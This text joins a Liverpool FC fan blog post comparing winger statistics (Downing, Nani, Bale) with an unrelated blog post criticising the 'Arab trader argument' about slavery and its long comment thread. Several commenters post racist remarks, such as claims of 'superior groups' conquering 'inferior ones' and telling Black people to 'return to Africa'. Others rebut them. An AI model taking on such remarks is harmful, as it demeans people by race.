It has been a while hasn’t it? Well, that is a “traditional” winger, but that role has evolved over time now. The best example in the Premier League last season, was probably Nani. Someone who can get it out wide, and deliver quality balls into the box. But also can float around, and get involved in the centre too. Our “winger” (term used loosely) options certainly lacked something of that calibre.
Maxi had an excellent end to the season, and when I wrote the original piece, it was before his mini goal rush. What Maxi gives is excellent ball retention, something which I often highlight as a key trait in this new look Liverpool. It is something clearly that Dalglish/Comolli wants to see in certain areas of the pitch, and Maxi gives you that. As I said in April, it was more than right for him to stay, because he gives our squad that extra bit of depth.
Unfortunately, that meant Joe Cole had to be sacrificed. If you give him the benefit of the doubt, then it is partly down to wages, and partly down to fitness. Judged on his limited performances last season, Cole seemed to do everything Maxi did, but Maxi did it better. Cole was moved on to Lille, and I wish him all the best.
Another player to leave (who I didn’t overly focus on), was Jovanovic. He really impressed me at the start of the season, and I thought we had finally got ourselves a bargain free transfer. But for whatever reason, he didn’t settle in to the Liverpool way. Even when Dalglish returned as manager, and we started to play better football, he was very rarely seen anywhere near the starting XI, or even on the bench.
And that finally leaves Dirk Kuyt. Still to this day, he often divides opinions. But I think he is brilliant to have in the squad, and as he has proved in a couple of the opening games, he can play as a forward also. His tireless work created the goal for Henderson against Bolton, and that sort of thing often gets missed. But Kuyt is no where near a “traditional” winger. He does make up for a lot of his weaker attributes, but having a winger option was key to us progressing.
So then, who had I identified as the answer? And, as before, did we sign him, or look elsewhere……..
After reported interest from Liverpool in January, both Young and Liverpool ended up looking at different options.
There was reported keen interest to take Ashley Young in the January transfer window. A lot of it made sense, as Young had stagnated at Villa, and with just (at the time) 18 months on his contract, a move then may have suited all. But come the summer, Ashley Young was on his way to our rivals Manchester United of course. Had we kept our interest, or did we spot someone else? Or, had Young said he wanted to go to United and no one else? That is something I don’t know, and I doubt many people do. But the simple fact is, he didn’t come to Liverpool. And after an excellent start to his Manchester United career, have we missed out? Or, did we get someone more suited to our needs?
Original table (from "Winger article"). Table as of April 2011 for season 2010/2011. A table showing some key “winger” stats. K = Kuyt, C = Cole, M = Maxi. Green indicates “better than our best”. Red indicates “Worse than our worst”.
When I look back, I always find this chart interesting. It shows clearly which of the Premier League wingers (that I looked at) were better than our current options (and in some cases, worse than our worst).
The one thing we clearly lacked was someone who could run with the ball. Look how much better every player was than our “best” option at the time? And our best dribbler, hardly played last season (Joe Cole).
I think we can all see the player that we did sign, isn’t on that list. So how does he fair up against some of the Premier Leagues best of last season? And, does he finally give us that option of a “winger”?
Downing, does he have "traditional winger" qualities? And, does he have a little bit extra too?
After the whole “Photoshopped Scarf” debacle, Downing was finally a Liverpool player in July of this summer. A player who, like it always seems to be with Liverpool fans, divided opinion. Some thought he finally would give us what we have been lacking for so long, which was natural width and creativity. Where as others thought he was “average at best”.
Much of this comes from an opinion of Downing in his earlier career. A player who was criticised (harshly) because of his selection(s) for England. The media seemed to think he was being picked, because of his relationship with one of his former managers Steve McClaren, who was in charge of the Three Lions. As this post on Liverpool fan site, RedandWhiteKop perfectly illustrates, Downing came with an aged old tag, one he has struggled to shake off for much of his career.
So what of the “new” Downing? Well, at Aston Villa last season, he was nominated their player of the year. It is fair to say that Villa didn’t have much to celebrate last season, but he certainly earned his own personal accolades and plaudits. He has been consistently a regular in the England Squad (despite his so called lack of “international class”), and he is now starting to worm his way into being a regular England starter.
But that is not why Liverpool paid for his services. His level of performances at International level, or poor perception in the media, is not why Liverpool signed him. In fact, it maybe quiet the opposite.
Buying such an “unfashionable” player, meant the competition for his services were less so than someone like Juan Mata. A player who seemed every Liverpool fan wanted (despite not all of them seeing him play). While the fee’s were possibly similar, it is unlikely that wages and salaries are. And, Mata was already at a good club with Valencia. A move to Liverpool may have been a sideways step (relative to where we were last season). Chelsea were in the Champions League, and, at the moment, probably just about still “ahead” of us overall (hopefully not come the end of the season of course).
Anyway, what many of you are here for is of course the Opta Stats (provided by EPLIndex.com ). I will look at Downing last season, against Nani, who I originally identified as the best mix of “traditional” and “modern” winger last season.
Comparison of "Winger" statistics. Nani, being the best example last season, against Downing and Gareth Bale.
I am still not surprised that Nani still top’s nearly all of the charts. But, if you look a bit closer, then Downing isn’t so far away in most areas. When you think of the respective teams that both players play for, is it any surprise that Nani is “better” than Downing? Ask it in another way, if you swapped Nani’s and Downing’s clubs around for a season, would Nani be top in most of the key areas? Probably not, no.
The only real key area where Downing really falls short is on the “dribbling” side of things. But as I wrote in the original article, this is something that was likely a tactic for Aston Villa. As we know, Houllier likes the ball “long early” for pace to run onto (Owen for us, Bent for Villa). So players like Downing and Young (who I wrote about originally) don’t dribble as much as they can. We have already seen evidence of Downing’s dribbling ability, after a great run against Sunderland, he was unlucky not to score (hitting the bar).
You are probably wondering why I put Gareth Bale in on this post? Well it brings me back nicely to what I said earlier. About how players are portrayed in the media. I am Welsh, and I think Bale is a brilliant talent. But his core statistics do not warrant a £40million price tag. And if they do, then how much is Downing and Nani worth? So, maybe we did get a bit of a “bargain” (time will tell).
So far, I think we have only seen flashes of what Downing can bring to us in a Liverpool shirt. He is quicker than what most thought, and he has been unlucky not to get on the score sheet. He has provided some quality delivery, but I think it even surprised some of our forwards how good it was. In time, this will no doubt improve, and I am sure we will see Downing top (or near) the assist/creation charts again for 2011/2012.
He may not have grabbed some of the headlines that Ashley Young has at United just yet, but in time, I am sure both will prove to be very good signings for their respective clubs. But I genuinely think Downing will bring more to Liverpool (in what they lacked), than what Young can bring to United. We have been crying out for a winger for as long as I can remember, and it is something that Liverpool had no problems with in the 60s, 70s, and 80s. But maybe, based on last season for Villa, and a positive start for Liverpool, we have found one for this new era.
This was Part III (Wingers). I was initially going to look at our business in “attack” as a whole, but I felt this Winger/Downing piece needed more focus and attention as a stand alone. I will complete the transfer window round up with Part IV (Forwards) soon, where I will look at Suarez, Carroll, Kuyt (again), and how our new signing will fit in. Follow me on twitter @barneystuta for regular updates.
by barneystuta
@Barneystuta Liverpool supporter. SOS Member. SaveLFC follower. Justice for the 96 believer. Oh yeah, and a rock and roll star. Honestly.
2 responses to “Transfer Window Review (Part 3) – Winger”
Transfer Window Review (Part 3) – Winger — Kop That - Liverpool FC says:
[…] View the full story here: Anfield Index […]
Emiliano says:
Nice article, just one correction. Bale is not a Winger, he is a left back, also in other reviews comparing defenders they used Bale to compare Ashley Cole and Jose Enrique, so its a bit unfair for Bale to be compared as a Winger.
Categories: Featured Article, LFC Statistical Comparisons and Liverpool FC Articles.' 'Tags: Ashley Young, Assists, Crosses, Nani, Stewart Downing and Winger.
Permalink: https://anfieldindex.com/3345/window-review-wingers.html
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« The perpetual foreigner stereotype
Cherrelle & Alexander O’Neal: Saturday Love »
The Arab trader argument
Sat Oct 3rd 2009 by abagond
The Arab trader argument is my name for an argument white Americans often use to defend the evil they do in the world. It goes like this: if white Americans do something evil and terrible it is all right – or at least not all that bad – so long as they can find at least one example from world history of someone else doing the same thing. Thus the Atlantic slave trade was not so bad because Arabs traders sold slaves too!
See how it works? Pretty cool trick.
The thing is utterly morally bankrupt. It is the everyone-does-it argument that we tried when we were eight . Our mothers did not buy it then and it does not work now – except maybe for the morally blind.
But that is just what many white Americans seem to be: morally blind. They know the evil that is done in their name, not just in the past but even now, but they do not want to see it. And when they are faced with it, they try to excuse it with stuff like this.
Maybe moral blindness leads to morally broken thinking – or is it the other way round?
It would be like if I robbed a bank and then said, “People rob banks all the time, what is the big deal?” Or if I slept with someone’s wife and I said, “Your wife had an affair two years ago. See! I am not that bad. Why are you angry at me?”
Do you see how shameless this kind of argument is?
It amazes me that anyone even tries it, for two reasons:
That anyone would waste more than two seconds trying to excuse something so clearly evil, like the slave trade, the Japanese American prison camps, racism, etc.
That they would try to use such a bad argument with a straight face and not see just how bad it is.
But they do it.
It seems to bring comfort to them, but that comfort is completely one-sided. It brings no comfort to those who have to suffer their evil. Like when the Jews were being sent to the death camps, did it bring any comfort to them to know that the Turks killed over a million Armenians?
Forms of this argument:
This is the way we have always done it
Blacks do it too
Blacks are racist too
There will always be racists
Right and wrong are not determined or proved by what everyone does, much less by what some people do, like Arab traders. That would just excuse everyone to sink to the lowest, meanest, most evil levels of behaviour.
A simple and far better way to determine right and wrong, without getting deep into religion or philosophy, is the Golden Rule, which is not “Do unto others as some others have done”, as the Arab trader argument would have it, but “Do unto others as you would have others do unto you.” Acts of racism fail this test by their very nature.
How to tell if a commenter is white
blame-shifting
white innocence
Apple-pie America – more on American moral blindness
The slave trade was immoral – also brings up the Arab trader argument
Pam Peters: The Cambridge Guide to English Usage – come to think of it, this everyone-does-it approach is applied even to English usage. Maybe it is not just a disingenous argument but a way of thinking!
Posted in 2000s, America, arguments, moral fallacies, racism, racist arguments, stuff white people say | 176 Comments
on Mon Oct 5th 2009 at 01:36:05 macon d
This is a great post, very clarifying. I hear this kind of thing all. the. time.
on Mon Oct 5th 2009 at 01:59:10 Herneith
This is a good catchall phrase for for these ‘arguements’!
on Mon Oct 5th 2009 at 10:35:34 Aiyo
Good post on a statement that has been heard too much
on Mon Oct 5th 2009 at 10:47:08 Vindicator
Good post! Abagond!
Why people use this argument is beyond me.
The adultery example is excellent for proving your point. A lot of people do think that it’s “alright” because “other people are doing it”.
on Tue Oct 6th 2009 at 02:35:04 temple
This is my favorite (this tactic was very often used by a white woman who had a feminist blog where she consistently silenced black women while trumpeting her personal sacrifice of giving birth to biracial kids): “Slavery happened centuries ago. It’s time to get over it. On the other hand, white women have been oppressed going back thousands of years. We must never forget this.”
Privileged much.
on Tue Oct 6th 2009 at 11:55:12 Black&German
Slavery happened centuries ago. It’s time to get over it. On the other hand, white women have been oppressed going back thousands of years. We must never forget this.
Nearly spit out my coffee reading that. Good grief.
Side note:
I do have to admit I’m a sucker for diversionary statements and ridiculous questions. I’m easy to distract that way because I enjoy going off on a tangent. So if you ever catch me feeding the trolls, as I am wont to do, please redirect me to the topic at hand. Trust that I won’t be offended. 🙂
on Tue Oct 6th 2009 at 21:16:54 Rose
“It brings no comfort to those who have to suffer their evil.” That’s hilarious. If whites didn’t exist stopped their “evil” as you put it, your standards of living would fall right back to where they were 200-300 years ago.
Personally, I would not be opposed to this. If blacks want their independence, that’s fine, just don’t expect whites to continue feeding your populations. Abagond, look at yourself. You’re a racist. Let me know when you, as a black man, are ready to apologize and pay reparations to the Khoisan for your ancestors having nearly exterminated them. If you take a long, objective look at history, you’ll realize that history is all about superior groups conquering (and sometimes, exterminating) inferior ones. This tendency is common to all of humanity (and indeed, to all living things) and is not exclusive to the white race. If you’re still alive today, you can be sure it’s because your ancestors at some point mercilessly crushed a competing group (either that, or they got lucky).
This is just the kind of thinking my post is talking about – excusing the evil that whites do by pointing out the evil done by others. Like that makes it right or something. It is morally bankrupt thinking.
Your comment shows a comfort with evil that is sickening.
on Wed Oct 7th 2009 at 01:12:33 La Reyna
May I ask which feminist website because there are several feminist who think like her just because she gives birth to Black children, she thinks that absolves her of being racist. That’s the type of thinking I get from White feminists who dismiss the unique histories of Women of Color in order to point their brand of being oppressed by their White men for centuries.
on Wed Oct 7th 2009 at 10:29:24 Vindicator
temple Says:
This is why you should never buy into feminist propoganda.
Not once do feminists ever explain how women have been oppressed.
on Wed Oct 7th 2009 at 16:15:14 dani
@ La Rena
co-sign 😉
on Thu Oct 8th 2009 at 01:18:10 temple
La Reyna,
This blogger recently went private & I prefer not to give the blog name. Being silenced is a very common experience among black women & other women of color in feminism. It’s happened to me IRL & in the blog world quite often–often enough that I’ve faced the reality that not all women are my allies.
on Thu Oct 8th 2009 at 18:53:32 Herneith
Of course having black children has made her an authority on black issues. As for the white women being oppressed for thousands of years, what about racialized women? Did she address this?
‘That they would try to use such a bad argument with a straight face and not see just how bad it is.’
Why would they? When maintaining their power,it is not in their best interest to do so. They may be oblivious to these facts.
* This is the way we have always done it
* Blacks do it too
* Blacks are racist too
* There will always be racists
Many whites possess a different moral compass than do racialized people. Many do-not have an inkling as to this lack either consciously or sub-consciously. The ones who do and are aware will try to debunk your arguments through condescending diversionary tactics which only serves to berate and humiliate the racialized person. This is particularly effective as it lets the racialized person know just exactly what you think of them and their group without resorting to racist name calling or your inherent superiority. Best of all, It makes them feel better as they have(in their mind) reinforced their self-perception that they are not racist. They are Just resorting to a logical explanations of how things really are. In effect, they are infantalizing the racialized person.
It works. I know this. Why? If one responds to their arguement and gets progressively angry, it reinforces the stereotypes they may already have of your racialized group, puffing them up further. This is why they throw in facts unrelated to the topic at hand. This throws you off kilter. Unless you have a photographic memory and can pull facts out the air at random, you may be at a loss as to how to respond effectively. This enforces their notion of your group as having sub-intelligence. If you try to deflect the impact of the arguement via comic relief, then you are a buffoon who doesn’t understand anyway. This is also a reflection of your groups mindset. If you respond with dumbness, then you are too stupid to in the first place, also reflective of your groups’ intelligence and inability to debate such things; at this point they may become paternalistic as if teaching a child. This has happened to me throughout the years. If you learn to argue and counteract these arguments you’re dismissed as an exception or as uppity. You can’t win for loosing! My reaction now is to tell them that I have no wish to engage them. This angers them as they can not dazzle you with their brilliance and emphasize your, and by extension your groups, lack thereof. You know what? I don’t care anymore, go dazzle someone else with your b********! The ones who are open to changing their white supremset mindset are relatively rarer.
on Fri Oct 16th 2009 at 04:10:57 Rycher
Yes but your ideological kin do the same thing all the time Abagond. For example, the Crusades are quite often used in EXACTLY the same manner to justify Islamic violence that occurs quite plentifully today.
(This despite the fact the the Crusades were largely a response to Islamic aggression and militancy in the first place).
Ultimately, your article here is null and void because your comrades do it all the time; they are guilty of the very thing you so righteously mock.
on Fri Oct 16th 2009 at 04:16:14 Herneith
@Rycher:
You’ve just proved his arguement which is other people do it!
Sorry, I meant; You’ve have just proved his argument whereby white Americans will say, “Everyone else does it to!”,when excusing any culpability in evil acts or criticism levelled at them for such.
on Fri Oct 23rd 2009 at 19:42:05 Rycher
First off: I abhor slavery and I view it as a point of shame for whites. With this in mind:
The arab slave trade is highly relevant when it comes to grievances concerning the white slave trade.
It is incredibly important to point out that the arab slave trade lasted well over ONE THOUSAND years, and that the white slave trade is given a maximum timeline of 2 to 3 centuries.
It is also important to note that the arabs were far more inhuman, cruel and brutal to their slaves than were the whites.
Moreover, despite the immorality and atrocities of the slave trades, the whites at least left a few benefits where they practiced colonialism: roads, electricity, water treatment, literacy, etc etc were often left behind in many communities that were under white colonial rule.
So why I am saying this? Again, I do not point to the arabs to try and EXCUSE white slavery. Slavery is inexcusable. I point to the arab slave trade because so much focus and attention is given to the white slave trade which was far shorter, far less brutal and at least had some benefits.
Since the arab slave trade was far worse by ALL MEASURES, why aren’t people getting after the arabs about it? This is what I find so absurd about this entire article- you point out all the terrible things about slavery but you are ready to dismiss a brutal slave trade that lasted over a MILLENIUM in order to attack whites.
Given that slavery is such an important part of your history and a continued point of contention between blacks and other races, why aren’t you pursuing the arabs who’ve committed this crime on a much much much greater scale? Why do you readily dismiss their crimes?
I’m quite sure I know why: you will find no sympathy from the arabs. But you will from whites.
Some important reading:
http://www.geocities.com/CollegePark/Classroom/9912/easterntrade.html
http://www.youtube.com/user/AhmadsQuran3#p/u/213/AHSP9TGLs4E
on Fri Oct 23rd 2009 at 20:17:51 sanabituranima
I’m no expert on the subject, but I know enough to know that that’s an over-simplification.
Since the arab slave trade was far worse by ALL MEASURES, why aren’t people getting after the arabs about it?
1. People do often mention the Arab slave trade. That’s what the post is about.
2. Consequences.
People are still suffering from the after-effects of Arab clonialism (Darfur is a tragic, potent example.) HOWEVER, I would argue that mre peole are suffering because of the after-effects of white colonialism. This makes discussion of white colonialism and slave-ownership more pertinent.
Some of my ancestors were probably enslaved by ancient Romans. And that was an immoral thing. HOWEVER, it does not directly affect my life now. I will not be treated any worse because some of my ancestors were slaves. I will not be denied a job or a promotion because of it. I am not ging to be shot by the police because of it. I am needn’t worry that in in emergency, paramedics will try less hard to save my life beause of it. The Roman idea of Britain being full of barbarian hordes has stopped being believed.
However, many people still believe that PoC, especially blacks, aren’t completely human. The transatlantic slave-trade was abolished, but the idea of black sub-humanity is still left over and still having negative consequences. That is why the transatlantic slave-trade is directly relevant to modern-day politics.
Also, abagond is an America, writing in the English language. The majority of his readers are Amercan. White slave-ownership has more immediate personal relevance to an American readership than other examples of slave-owning societies.
3. He is not saying that the Arab slave trade was remotely ok. He is just saying that 2 wrongs cannot ever make a right.
on Fri Oct 23rd 2009 at 21:28:05 abagond
Rycher:
Your moral reasoning is broken.
If you disagree, then when your wife catches you with another woman all you have to do is say this: “I know what I did was wrong, but my friend Joe has been cheating on his wife WAY LONGER than me. And he beats her too. Please keep that in mind!”
And if she continues to be angry at you, say this: “Why are you so angry at me but not at my friend? I mean, he is way worse than me! You are being unfair.”
And then do not forget to pat yourself on the back and say: “The only reason you are angry at me is because you will find no sympathy from him but you will from me.”
To pick up on what Sanabitur Anima said, I know no one who has been affected by the Arab slave trade nor do I live in a country that has been shaped and continues to be shaped by that trade. That is quite untrue about the Atlantic slave trade.
The degree of dehumanization of blacks and moral blindness of whites required by that trade still live on. That is why I had to write this post in the first place.
Her example about the Roman slave trade is a good one.
on Fri Oct 23rd 2009 at 23:22:23 nicia
There was also a difference in the Arab/African slave trade vs the European one. They had a unique brand of cruelty which dictated that even a drop of Black blood made one a slave. So European slavery led slaves and their descendants into neverending perpetual slavery.
In contrast, the descendants of Arab and African slaves were born free,were given same rights and were free to intermarry.
If you ask any African living in Africa if they descended from a conquered slave class, they prob wouldn’t know. They’ve prob been treated as an equal their whole life. They can go out and get a job,not get followed in stores or stopped by police.
Ask a Black living in a White country where slavery was practiced hundreds of years ago what their life is like…..jobs,respect, etc,,, and you’ll see that European slavery mentality still exists…It hasn’t ended…on paper only
on Sat Oct 24th 2009 at 01:15:27 Rycher
Abagond I can see how you’d interpret my reasoning the way you did, but I can assure you that’s not at all what I meant. (I’d be embarrassed to ever resort to that cheap kind of pseudo-reasoning.)
In short,this is what I meant to convey:
Whenever I see people talking about the slave trade and its horrors, it boggles my mind how the best example of slavery that human history has to offer, the ARAB SLAVE TRADE, is never mentioned and is seldom taught in school. You’d be surprised how few people actually know about the arab slave trade, despite its sheer length and magnitude.
(I realize that this article has the arab slave trade as its headline but the topic was just used to segue into the white slave trade) But I understand that you blog about the atlantic slave trade since you live in the USA. I understand that.
However I’m curious, what do people here think about pursuing reparations from arabs and their slave trade?
Would it be worth pursuing?
What kind of response would you expect?
on Sat Oct 24th 2009 at 15:00:13 abagond
It seems pretty clear that I will have to do a post on the Arab slave trade itself since it keeps coming up and some commenters act as if I am not seeing the light that they see. But that is not the subject of this particular post.
I did not bring up the Arab slave trade to segue into the Atlantic one. I brought it up because it is used to make a bad moral argument to defend white racism, an argument that comes up in different forms. A form of pseudo-reasoning, as you put it.
on Tue Dec 29th 2009 at 18:16:20 Big Rome
This is a great article that does a great job of throwing light upon this argument which is used in many forms and many places (not least the emphasis by those in NeoConfederate movements to highlight Lincoln’s racism and thereby absolve the sins of the South)- I’m glad you’ve started a great discussion here.
Being a student and scholar of Race in the US, I would also point out that while Slavery has (and unfortunately still does) exist(ed) across the world and across the centuries, racialized slavery was novel to the New World in general and the US in particular. In no other place and at no other time had an institution of heritable and permanent chattel slavery existed, nor has it existed since, on the scale and to the degree practiced by peoples of European descent on peoples of African descent. That set of facts is undeniable.
on Tue Dec 29th 2009 at 18:26:45 Mira
Hmmm… I think that Arab trader argument actually means: “people of all races did horrible things; whites are not evil by nature!”
Nobody’s evil by nature. That’s not the point. The point is: just because another group of people did some horrible things, it doesn’t mean crimes made by your own gorup any less horrible.
I never said it that’s the way I see it. In fact, I don’t see it that way. I see it as a very, very poor excuse for doing horrible things.
But I think white people see it like I described. I might be wrong, though.
on Fri Mar 5th 2010 at 19:33:24 Honky
But how can whites constantly be singled out and berated and be condescended to if everyone did it? It’s like if 100 people robbed 100 banks but we’re only going to punish the one who made the most money off of it.
on Sun May 30th 2010 at 17:56:09 Robin
While I do agree that whites do use this and I’m not trying to excuse their actions. I think that it’s a human reaction not to wanting your group or culture being look at as horrible amd unhuman. Everybody wants to believe that their group that they represent is good. While whites have the arab trade agruement, Blacks have the well, at least, they didn’t go through slavery agruement towards gays and other non-black ethnic groups. They’ll use the same book to dehumanize gays that was used to take away their idenity and justify slavery. Maybe I feel this way because I’m experience racism both sides.
on Sun May 30th 2010 at 19:37:49 abagond
You are using the Arab Trader argument to defend the Arab Trader argument.
The Arab Trader argument says that it is not so bad to do x because other people do it too. But that is a very poor way to determine whether something is moral or not. Whatever x is, you will almost always find other people doing it.
My own rule of thumb: an argument that could defend cannibalism probably has something wrong with it.
on Tue Dec 14th 2010 at 11:04:10 chroniclinghate
If someone attempts to justify the transatlantic slave trade by mentioning the Arab slave trade then yes that is a reprehensible argument. However bringing up the Arab slave trade is a legitimate response to racist nonsense attempting to paint slavery as being something unique to “White people” or something that “White people” should guilty about, just as it’s legitimate to mention non-Islamic terrorism in order to counter bigoted filth attempting to portray terrorism as something unique to Muslims. If it’s wrong to respond to racist arguments that portray slavery strictly as a white evil then Tim Wise is also just as wrong for citing statistics about White crime in order to demolish White supremaicst propaganda that claims that African-Americans are a uniquely criminal racial group. There is a clear difference between a rational discussion of the transatlantic slave trade and a racist screed portraying Whites as collectively guilt of slavery while ignoring non-Western forms of slavery or White victims of slavery (over three million Eastern Europeans were enslaved by the Crimean Khanate).
http://historyanarchy.blogspot.com/2010/03/white-people-know-their-slavery.html
“he story of 50,000 Irish who were transported as slaves to Barbados and Virginia in the 17th century is chronicled for the first time.”
http://www.amazon.com/Hell-Barbados-Ethnic-Cleansing-Ireland/dp/0863222870
on Sat Feb 5th 2011 at 23:39:24 Dawn
Unfortunately as much as you have a point? Some people especially PoC try to derail any discussion of the multifacted nature of racism and history by using this argument as if the mere discussion of historical issues and how it has affected the world today is somehow making excuses for another dark and inhuman part of history.
So even if you’re just talking about the Trans-sahara slave trade, you’re likely to get someone breaking in to the conversation to harass you about how you’re supposedly using it to negate the evil that the western world has done. Even if the trans-atlantic slave trade hasn’t been mentioned.
At the end of the day, what Hitler did to the Jews does not eclipse, remove or erase any other genocide that has happened in history. It is wrong to point at another genocide and use that to try and say that Hitler wasn’t such a bad guy, it is not wrong to simply talk about historical genocides including the holocaust in general and what was behind them.
Besides most people do not deny that the trans-atlantic slave trade was inhuman, cruel and downright evil, but some of us do get tired of it being treated as the only slave trade in the history of the world evah cos PoC just “don’t do that sort of thing” in some people’s minds backed up by people attempting to shut down any discussion that might dispell the illusion that white people are the only people capable of true evil.
on Sun Feb 6th 2011 at 00:50:18 Kwamla
The difficulty with using this Arab Trader argument to account for something like the African Transatlantic slave trade is one of degree and magnitude. It also shows a lack of awareness of the scope and dimensions involved.
One way to recognize or begin to appreciate this is to use another analogy:
Imagine a small grocery store. Like Groceries ‘R’ Us. They rapidly expand to include other items like clothing, then maybe electrical goods. Other groups watch this and begin to get in on the act. Soon there are lots of small and large Groceries, Clothes and Electrical goods ‘ R ‘ Us all over the country.
Suddenly, there emerges a big, gigantic Groceries ‘R’ Us. Its bigger than anything that has gone before its called Walmart it expands all over the country but then it gets even bigger. It expands to other countries as well. It takes over and swallows up existing Groceries ‘R’ Us. stores all over the planet. It becomes a monster. But because its grown so big and has a branch in every country on the planet it starts to be the main grocery store most people recognize and go to.
Its now hard to remember a time when going to a grocery store didn’t mean going to a Walmart.
The African Transatlantic slave trade became that Walmart Before this there only used to be Groceries ‘R’ Us and every country had their own one. In fact some still do.
on Sun Feb 6th 2011 at 01:09:54 King
“Some people especially PoC try to derail any discussion of the multifacted nature of racism and history by using this argument as if the mere discussion of historical issues and how it has affected the world today is somehow making excuses for another dark and inhuman part of history.”
@ Dawn
Hey Dawn, it’s difficult to say whether you are making a valid point or not. So let me ask you this.
Please simply link to 2 or more examples of what you’re talking about. I think that’s fair. You have an entire internet to draw from. I’m not even saying that what you describe doesn’t exist… after all, everything happens, at least once or twice, somewhere on the internet. Just post a few examples of it.
on Sun Feb 6th 2011 at 13:52:41 Herneith
@Dawn:
Tell us culluds what it is we need to know!
on Fri Feb 18th 2011 at 09:19:58 chroniclinghate
@Kwamla
Islamic slavery was just as vast and it lasted much longer than Western slavery; the Saudis ‘abolished’ in the late 20th century and there has never been an Islamic abolition movement. The trade has deeply scarred Africa as evidenced by the massacres of Arabs by Blacks during the Zanzibar revolution. The idea that the transatlantic slave trade was the first major form of slavery is absurd; the Mongols for example practiced mass murder and slavery on an industrial scale.
However anyone brining up non-Western forms of slavery to counter legitimate discussion of American slavery is defending slavery. However if someone was to bring up slavery in order to demonize ‘Whites’ then yes I would bring up such things as Islamic slavery or the type of slavery practiced by the Imperial Japanese army that would be a legitimate argument much like an African-American citing ‘White’ crime groups and gangs to respond to racists attempting to demonize Blacks as a uniquely criminal people
on Fri Feb 18th 2011 at 18:36:38 Kwamla
@chroniclinghate.
You do seem to have problems when it comes to trying to make connections or comparisons. Particularly when scales of degree, magnitude and depth are involved.
Surprisingly enough though you don’t seem to have this as a problem when it comes to making comparisons between the plight of the Palestinians and Jews. And in particular the roles of Nazi Germeny and Israel.
I extracted these comments from your own blog:
“Does a Holocaust survivor have the right to speak his mind and say ‘what happened to me during the Holocaust, I see it happening again to Palestinians, Never Again for Anyone.’ Should he be labeled an anti-Semite for such statements?”
This is nothing more than a crude attempt to equate Israel with nazi Germany and the Palestinians with the Jews; a hateful and ignorant comparison. Does anyone recall Jewish suicide bombings? Has Israel killed over four million people? Any honest individual with a fifth grader’s command of history can see that Emperor’s garbage is a thinly veiled anti-Semitic attack.
What is it that you see that is so unique to Jewish, genocidal, holocaust experience that you are unable to see in the African, genocidal, holocaust experience?
Which incidentally lasted over 500 years as an institution but left a legacy that Africa and its diasporic peoples are still left traumatically dealing with. On top of which is a continent that has and continues to be plundered and exploitered for its natural resources to the obvious detriment of its own people?
And you believe Islamic slavery had a greater impact? Or are you just unable to equate the sufferings of anyone non-Jewish with horrors of the Jewish holocaust?
Incidentally. If you really wish to understand why anyone would even attempt to equate what Israel is doing to the Palestinians with Nazi Germany – they may not be quite there yet. But they are heading down that direction – you should have a look at this documentary. Its very graphic in detail:
And then listen to Auschwitz Survivor on Palestine here:
on Sat Jul 30th 2011 at 20:43:32 mindweapon
OK, ok, you don’t like the Arab trader theory that contemporary whites owe less than zero to blacks.
How about this one:
“I don’t care, and I refuse to be held liable, and I will fight to the death against any black-slavery-reparations-debt-collectors.
Come on and try to take my house and my family. Come get your repamarations. In the end, I don’t give a fig about your arguments, I think they are bullshit, I am not swayed in the least by any theory of “white guilt” or, to use the modern Tim Wise euphemism, “white responsibiltity.” I repudiate it all.
I think you owe us, and you can make the debt good by returning to Africa.
on Sat Jul 30th 2011 at 21:53:20 Herneith
That’s not what the argument entails. The argument has nothing to do with ‘reparmations’, it is a evasive tactic to draw attention from themselves. However, if you wish to ‘contribute to my own ‘repamarations, my email address is: herneith@blowitoutyourhole.com. I take banker’s cheques, money orders, wire transfers if you are sending money internationally, crdit cards and PayPal.
Hey now! Think of the tax write-off!
Come on and try to take my house and my family. Come get your repamarations.
I’m not interested in trailor homes. Do you live in a mansion? I’ll take that! Your family? Sorry, I am not interested in inbred people, too many potential problems.
In the end, I don’t give a fig about your arguments,
How about a figleaf?:
I am not swayed in the least by any theory of “white guilt” or, to use the modern Tim Wise euphemism, “white responsibiltity.” I repudiate it all.
“Get your facts first, then you can distort them as you please.” Mark Twain.
If your mind is a weapon, then the trigger is jammed and the barrel is rusted.
You’re asking what we collectively think about an argument that is basically, “I don’t care if your arguments are valid or not! Just you try and make me pay?”
The main argument here is for acknowledgement of privilege, not “reparation.” BTW, what do you owe the Native Americans and when are you planning to pay therm back by returning to Ireland?
http://www.globalpost.com/dispatch/ireland/090113/irish-economy-nears-collapse
on Sun Jul 31st 2011 at 04:43:52 Herneith
@King;
He suffers from chronic brain flatulence!
on Sun Jul 31st 2011 at 06:37:29 Columnist
True, but why punish only whites, and not other slave traders?
By the way, instead of petty squabbling, both whites and Black people should learn Hebrew, Arabic and Chinese.
on Sun Jul 31st 2011 at 07:40:35 King
Lol! And how!
When whites enslaved Black people, white people were Christians. Now, most Black people are Christians. Oh the irony!
I think if you check the worldwide numbers, most Blacks are probably Muslim. Most American Blacks are Christian.
Well, Kenya is 80% christian,…
on Sat Mar 17th 2012 at 06:16:53 Deb
@King…“Most American Blacks are Christian”Yep, and irony had nothing to do with it!
on Fri Jun 15th 2012 at 08:08:42 Unbeweavable | Slouching Towards Kingston
[…] argument is like when white people say that they shouldn’t be held accountable for slavery, because “Arabs sold slaves too!” That type of derailment fails specifically […]
on Fri Oct 26th 2012 at 01:21:47 Jack
I think you will find that most people bring up the Arab slave trade, not to make the European slave trade look better by comparison, but more to try and dispell the popular notion that only white people were responsible for the slave trade. What both the whites and the Arabs did was terrible, though to be fair i don’t think people should blame the slave trade on entire races of people. I was carried out solely by and for a small minority of rich elites. The average European or Arab peasant would not have had any involvement, most were probably weren’t even aware of the atrocities that were being commited in Africa and the other parts of the world, heck they were probably treated like slaves themselves, by the rich lords and land owners. They were bad times to be poor anywhere in the world.
on Fri Oct 26th 2012 at 11:35:22 abagond
Excellent point.
on Sun Oct 28th 2012 at 07:58:15 oogenhand
Although you have objective morality on your side, is it prudent to attack the only ones that set their own slaves free?
on Thu Nov 1st 2012 at 09:15:45 oogenhand
@Deb
Some strictly monotheistic religions would consider forced conversion to Christianity from “idolatry” a step up. BTW, Christianisation of Europe was largely non-consensual, too.
on Wed Nov 7th 2012 at 10:54:32 barchan
